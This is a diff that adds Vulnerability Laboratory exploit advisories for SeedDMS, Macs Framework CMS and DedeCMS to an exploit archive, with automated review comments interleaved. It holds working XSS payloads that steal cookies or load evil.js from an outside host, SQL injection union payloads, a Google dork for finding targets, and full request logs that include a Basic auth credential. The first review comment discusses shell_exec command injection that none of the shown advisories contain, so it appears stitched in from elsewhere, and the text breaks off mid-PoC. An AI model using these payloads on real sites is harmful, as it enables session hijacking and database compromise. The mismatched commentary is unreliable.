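Review bot: The vulnerable code shows the root cause directly: `$host` is taken from `$_GET['ping']` (and from `$_GET['socket']` after `str_replace(':',' ', ...)`) and concatenated into `shell_exec()`, but the advisory never names the fix; it should state that the value must be validated before it reaches a shell, e.g. `if (!filter_var($host, FILTER_VALIDATE_IP)) { exit; }` for the ping case, and wrapped with `escapeshellarg($host)` in both `shell_exec` calls regardless (the socket variant needs host and port validated separately because it deliberately inserts a space). The PoC URLs are printed unencoded; the `;`, spaces, quotes and `>` need percent-encoding or the browser and PHP will not deliver the intended command string. Both PoCs write `info.php` into the web root, a persistent artefact the tester must remove afterwards. `Tested on: windows 10 , firefox` describes the client, while `ping -n -q -c 1 -w` and `nc -v -z -w` imply a Unix-like server, which is worth stating so readers do not expect it to work against Windows `ping`.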
@@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. 
+ + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. 
+ +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! 
+ + +PoC: Vulnerable Source (Log Management - View) +<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog +?logname=20200413.log +Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe +src="evil.source" onload="alert(document.cookie)"></iframe> +&comment=<iframe src="evil.source" +onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199 +</pre> + + +PoC: Payload +>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe> + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"<iframe src=evil.source +onload=alert(document.cookie)></iframe>&comment=>"<iframe +src=evil.source onload=alert(document.cookie)></iframe> +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) 
+Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php 
+https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+ +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt 
@@ -0,0 +1,482 @@ +# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download +# CVE: N/A + +Document Title: +=============== +Macs Framework v1.14f CMS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2206 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2206 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management +System. It focuses mainly on the +Edit In Place editing concept. It comes with a built in blog with +moderation support, user manager section, +roles manager section, SEO / SEF URL. +https://sourceforge.net/projects/macs-framework/files/latest/download + +(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple web +vulnerabilities in the official Macs Framework v1.1.4f CMS. 
+ + +Affected Product(s): +==================== +Macrob7 +Product: Macs Framework v1.14f - Content Management System + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 & 1.2 +Multiple non-persistent cross site scripting web vulnerabilities has +been discovered in the official Mac Framework v1.1.4f Content Managament +System. +The vulnerability allows remote attackers to manipulate client-side +browser to web-applicatio requests to compromise user sesson credentials +or to +manipulate module content. + +The first vulnerability is located in the search input field of the +search module. Remote attackers are able to inject own malicious script +code as +search entry to execute the code within the results page that is loaded +shortly after the request is performed. The request method to inject is +POST +and the attack vector is located on the client-side with non-persistent +attack vector. + +The second vulnerability is located in the email input field of the +account reset function. Remote attackers are able to inject own +malicious script code as +email to reset the passwort to execute the code within performed +request. The request method to inject is POST and the attack vector is +located on the +client-side with non-persistent attack vector. 
+ +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent external +redirects to +malicious source and non-persistent manipulation of affected or +connected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] searchString +[+] emailAdress + + +1.3 +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Mac Framework v1.1.4f Content Managament System. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The sql injection vulnerabilities are located in the `roleId` and +`userId` of the `editRole` and `deletUser` module. The request method to +inject or execute commands is GET and the attack vector is located on +the application-side. Attackers with privileged accounts to edit are +able to inject own sql queries via roleid and userid on deleteUser or +editRole. Multiple unhandled and broken sql queries are visible as default +debug to output for users as well. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a privileged web-application user account. +Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] deleteUser +[+] editRole + +Vulnerable Parameter(s): +[+] userId +[+] roleId + + +Proof of Concept (PoC): +======================= +Google Dork(s): intitle, subtitle & co. +Site Powered by Mac's PHP MVC Framework Framework of the future +Design downloaded from Zeroweb.org: Free website templates, layouts, and +tools. + + +1.1 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. 
+For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">"<iframe src=evil.source +onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 + + +PoC: Vulnerable Source +<form method="post" +action="https://macs-cms.localhost:8080/index.php/search" id="searchForm"> +<span class="searchLabel">Search Site:</span><input type="searchString" +value="" name="searchString" class="searchString"> +<input type="submit" value="Search" class="searchSubmit"> +</form><br> +<span class="error">No Results found for: "<iframe src="evil.source" +onload="alert(document.cookie)"></span> + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/search +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 112 +Origin: https://macs-cms.localhost:8080 +Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +Upgrade-Insecure-Requests: 1 +searchString=>">"<iframe src=evil.source +onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 9865 + + +1.2 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. 
+For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Exploitation +test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com + + +PoC: Vulnerable Source +<form method="post" +action="https://macs-cms.localhost:8080/index.php/main/cms/login" +class="ajax" ajaxoutput="#loginMessage"> + <table style="width:100%"> + <tbody><tr> + <td style="width: 20px">Username:</td> + <td><input type="text" name="username"></td> + </tr> + <tr> + <td>Password:</td> + <td><input type="password" name="password"></td> + </tr> + <tr> + <td colspan="2"><input type="submit" value="Login"></td> + </tr> + <tr> + <td colspan="2"><br><div id="loginMessage" style="display: +block;">Invalid Username or Password</div></td> + </tr> + </tbody></table> + <br> + <a +href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword" +class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a> +<input type="hidden" name="scrollPosition" value="102"></form> +<div id="forgotPassword" style="display: block;"> +<form class="ajax" method="post" +action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess" +ajaxoutput="#forgotPasswordReturn"> + Enter your email address: <input type="text" name="emailAddress"><br> + <input type="submit" value="Send Email"> +</form> +<br> +<div id="forgotPasswordReturn" style="display: block;">Cannot find user +with Email address: +test"<iframe src=evil.source +onload=alert(document.cookie)>@gmail.com</iframe></div> +</div> + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 
+Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source +onload=alert(document.cookie)>@gmail.com +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 105 + + +1.3 +The remote sql injection web vulnerability can be exploited by remote +attackers with privileged application user account and without user +interaction. +For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. 
+ + +PoC: Payload +%27-1%20order%20by%205-- +%27-1%20union select 1,2,3,4,@@version-- + + +PoC: Exploitation +<html> +<head><body><title>Mac's CMS SQL Injection PoC</title> +<iframe +src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20> +<iframe +src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union +select 1,2,3,4,@@version--%20> +<iframe +src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20> +<iframe +src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union +select 1,2,3,4,@@version--%20> +</body></head> +</html> + + +--- PoC Session Logs [GET] --- +https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1 +order by 5-- +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1; +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 53 + + +--- [SQL Error Exception Logs] --- +SQLSTATE[HY000]: General error: 1 near "1": syntax error +- +Error executing SQL statement +SQLSTATE[HY000]: General error: 1 unrecognized token: "''';" +- +Error executing SQL statement +SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range - +should be between 1 and 5 +- +5.0.12 'pwnd +This page was created in 1.5665068626404 seconds + + +Security Risk: +============== +1.1 & 1.2 +the security risk of the client-side cross site scripting web +vulnerabilities in the search and email reset function are estimated as +medium. 
+ +1.3 +The security risk of the remote sql injection web vulnerabilities in the +id parameters on delete are estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. 
All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48326.txt b/exploits/php/webapps/48326.txt new file mode 100644 index 000000000..8a6dbdd15 --- /dev/null +++ b/exploits/php/webapps/48326.txt 
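Review bot: Section 1.3 lists `Request Method(s): [+] POST`, but its PoC and session log send `roleId` and `userId` in the query string of GET requests to `editRole` and `deleteUser`; this should read `[+] GET` so the reproduction matches the log. The `# Title:` line labels the whole file "Persistent Cross-Site Scripting" while the body documents two non-persistent (reflected) XSS issues plus SQL injection, and the version appears as both `v1.14f` and `v1.1.4f`; a title such as `Macs Framework 1.14f CMS - Multiple Web Vulnerabilities` and a single version string would avoid mis-triage. The SQL error log is SQLite output (`SQLSTATE[HY000]: General error: 1 unrecognized token`), consistent with the product's stated SQLite storage, so the `@@version` union payload, which is not SQLite syntax, and the `5.0.12 'pwnd` result should say which backend they came from or be replaced with an SQLite-valid equivalent such as `sqlite_version()`. The search PoC log also reproduces an `Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=` header that decodes to a username/password pair; even for a lab host that is worth redacting before publication.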
@@ -0,0 +1,363 @@ +# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor Link: http://www.dedecms.com +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2195 + + +Release Date: +============= +2020-04-09 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2195 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Welcome to use the most professional PHP website content management +system in China-Zhimeng content management system, +he will be your first choice for easy website building. Adopt XML name +space style core templates: all templates are +saved in file form, which provides great convenience for users to design +templates and website upgrade transfers. +The robust template tags provide strong support for webmasters to DIY +their own websites. High-efficiency tag caching +mechanism: Allows the caching of similar tags. When generating HTML, it +helps to improve the reaction speed of the +system and reduce the resources consumed by the system. + +(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent cross site vulnerabilities in +the official DedeCMS v5.7 SP2 (UTF8) web-application. + + +Affected Product(s): +==================== +DesDev Inc. 
+Product: DedeCMS - Content Management System v5.7 SP2 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-09: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerabilities has been +discovered in the official DedeCMS v5.7 SP2 UTF8 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent script code inject web vulnerabilities are located in the +`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor` +and `CKEditorFuncNum`parameters of the `file_pic_view.php`, +`file_manage_view.php`, `tags_main.php`, `select_media.php`, +`media_main.php` files. +The attack vector of the vulnerability is non-persistent and the request +method to inject is POST. Successful exploitation of the vulnerability +results in session hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation +of affected or connected application modules. 
+ +Request Method(s): +[+] POST + +Vulnerable File(s): +[+] file_pic_view.php +[+] file_manage_view.php +[+] tags_main.php +[+] select_media.php +[+] media_main.php + +Vulnerable Parameter(s): +[+] tag +[+] keyword +[+] activepath +[+] fmdo=move&filename & fmdo=edit&filename +[+] CKEditor & CKEditor=body&CKEditorFuncNum + + +Proof of Concept (PoC): +======================= +The web vulnerabilities can be exploited by remote attackers with +privileged user account and with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Request: Examples +https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads +https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc +https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en + + +PoC: Payload +".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].* +onload=alert(document.domain)> +>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png +onload=alert(document.domain)"> +>"><iframe src=evil.source onload=alert(document.domain)> +%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E +%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E +%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E + + +PoC: Exploitation +<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title> +<iframe +src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E"> +<iframe +src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads"> +<iframe 
